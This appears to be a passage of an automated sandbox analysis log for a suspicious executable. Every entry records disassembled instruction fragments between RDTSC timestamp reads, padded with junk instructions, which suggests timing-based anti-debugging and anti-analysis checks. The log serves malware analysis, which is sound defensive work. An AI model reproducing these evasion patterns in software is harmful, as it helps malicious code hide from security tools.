Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EDB5BD second address: EDB5C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EDB5C2 second address: EDB5C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EDBCCA second address: EDBD0D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnp 00007F17B0CB1426h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F17B0CB1435h 0x00000011 pop ecx 0x00000012 pushad 0x00000013 jmp 00007F17B0CB1437h 0x00000018 push edi 0x00000019 pushad 0x0000001a popad 0x0000001b push edx 0x0000001c pop edx 0x0000001d pop edi 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EDBD0D second address: EDBD2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17B0FBC278h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EDBE90 second address: EDBE94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EE3E4F second address: EE3E58 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EE3E58 second address: EE3E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EE4103 second address: EE412A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F17B0FBC26Ch 0x00000010 jg 00007F17B0FBC266h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EE455F second address: EE4565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EE4565 second address: EE4569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EE484F second address: EE4853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EE4853 second address: EE486B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F17B0FBC26Ah 0x0000000d jnc 00007F17B0FBC266h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EE4B55 second address: EE4B7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1436h 0x00000007 jmp 00007F17B0CB142Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EE5234 second address: EE5238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EE5238 second address: EE523C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EE523C second address: EE5246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EE5246 second address: EE524C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EEC813 second address: EEC81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F17B0FBC266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EEC81D second address: EEC821 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EEC821 second address: EEC83E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F17B0FBC274h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EF99E1 second address: EF9A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F17B0CB1431h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F17B0CB142Fh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EFC52C second address: EFC532 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F083DC second address: F083F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jc 00007F17B0CB1426h 0x0000000c jc 00007F17B0CB1426h 0x00000012 jo 00007F17B0CB1426h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F083F5 second address: F083FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F17B0FBC266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F0F5CA second address: F0F5DF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F17B0CB1426h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007F17B0CB1456h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F0F5DF second address: F0F5E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F15721 second address: F15725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F15725 second address: F15729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F15729 second address: F1573B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F17B0CB142Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1573B second address: F15744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F15744 second address: F1574A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1574A second address: F1574F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1574F second address: F15756 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1B444 second address: F1B44E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F17B0FBC266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1B44E second address: F1B45E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F17B0CB1426h 0x0000000a jbe 00007F17B0CB1426h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1B45E second address: F1B474 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1B5A2 second address: F1B5AC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F17B0CB1426h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1B877 second address: F1B87C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1B87C second address: F1B891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0CB1431h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1B891 second address: F1B8B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F17B0FBC277h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1BA6A second address: F1BA6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1BBEE second address: F1BBF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1BBF4 second address: F1BC07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F17B0CB1426h 0x0000000d js 00007F17B0CB1426h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1BC07 second address: F1BC0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1BC0B second address: F1BC13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1BC13 second address: F1BC2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F17B0FBC276h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1C8FC second address: F1C900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F1FDAE second address: F1FDBC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F17B0FBC26Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F21D87 second address: F21DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F17B0CB1426h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 jl 00007F17B0CB1426h 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F3437B second address: F3437F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F5B9AC second address: F5B9B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F5B642 second address: F5B669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jnp 00007F17B0FBC268h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F17B0FBC276h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F5B669 second address: F5B6B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1434h 0x00000007 jmp 00007F17B0CB1435h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007F17B0CB142Ch 0x00000017 jns 00007F17B0CB142Eh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F5D360 second address: F5D3A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F17B0FBC274h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 jmp 00007F17B0FBC26Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F17B0FBC275h 0x00000022 jl 00007F17B0FBC266h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F5D3A4 second address: F5D3BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1431h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F5D3BB second address: F5D3EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F17B0FBC274h 0x0000000a jmp 00007F17B0FBC279h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F5D16E second address: F5D176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F5D176 second address: F5D1A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC272h 0x00000007 jmp 00007F17B0FBC275h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F5D1A4 second address: F5D1DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jo 00007F17B0CB1426h 0x0000000f jmp 00007F17B0CB142Eh 0x00000014 pushad 0x00000015 popad 0x00000016 ja 00007F17B0CB1426h 0x0000001c popad 0x0000001d jmp 00007F17B0CB1435h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F5FF66 second address: F5FF6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F5FF6B second address: F5FF85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0CB1436h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F5FF85 second address: F5FF89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F5FF89 second address: F5FFC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007F17B0CB1438h 0x00000010 stc 0x00000011 push 00000004h 0x00000013 add edx, dword ptr [ebp+1248C2A7h] 0x00000019 push A2E76742h 0x0000001e pushad 0x0000001f pushad 0x00000020 jmp 00007F17B0CB142Ah 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F5FFC8 second address: F5FFD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jns 00007F17B0FBC266h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F60226 second address: F6024B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F17B0CB1435h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F6024B second address: F6024F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F6024F second address: F60255 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F60255 second address: F6025F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F17B0FBC266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F6025F second address: F6028B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F17B0CB1430h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jp 00007F17B0CB142Ch 0x0000001b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F63347 second address: F63357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 ja 00007F17B0FBC26Eh 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F62E3C second address: F62E8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 jnc 00007F17B0CB1426h 0x0000000d jng 00007F17B0CB1426h 0x00000013 jmp 00007F17B0CB1434h 0x00000018 popad 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c jc 00007F17B0CB142Ch 0x00000022 jg 00007F17B0CB1437h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F62E8A second address: F62E92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: F64FF6 second address: F65003 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jno 00007F17B0CB1426h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420E6A second address: 5420EAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F17B0FBC273h 0x00000009 xor si, 39AEh 0x0000000e jmp 00007F17B0FBC279h 0x00000013 popfd 0x00000014 push ecx 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420EAC second address: 5420EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420EB0 second address: 5420EB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420EB4 second address: 5420EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420EBA second address: 5420EE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F17B0FBC26Ah 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F17B0FBC273h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420EE3 second address: 5420EE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420EE7 second address: 5420EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410CED second address: 5410CF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5460010 second address: 5460016 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5460016 second address: 5460027 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0CB142Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5460027 second address: 54600C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC271h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ecx, 6412CD53h 0x00000012 call 00007F17B0FBC278h 0x00000017 call 00007F17B0FBC272h 0x0000001c pop eax 0x0000001d pop edi 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007F17B0FBC271h 0x00000025 xchg eax, ebp 0x00000026 pushad 0x00000027 mov dx, cx 0x0000002a mov edx, eax 0x0000002c popad 0x0000002d mov ebp, esp 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 push edx 0x00000033 pop ecx 0x00000034 pushfd 0x00000035 jmp 00007F17B0FBC273h 0x0000003a and ch, FFFFFFAEh 0x0000003d jmp 00007F17B0FBC279h 0x00000042 popfd 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54600C5 second address: 54600E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 mov eax, 24AD932Fh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F17B0CB1431h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F00C9 second address: 53F00CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F00CF second address: 53F00D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F00D5 second address: 53F0117 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC278h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edx, 32D75D80h 0x00000014 call 00007F17B0FBC279h 0x00000019 pop eax 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F0117 second address: 53F0128 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0CB142Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F0128 second address: 53F012C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
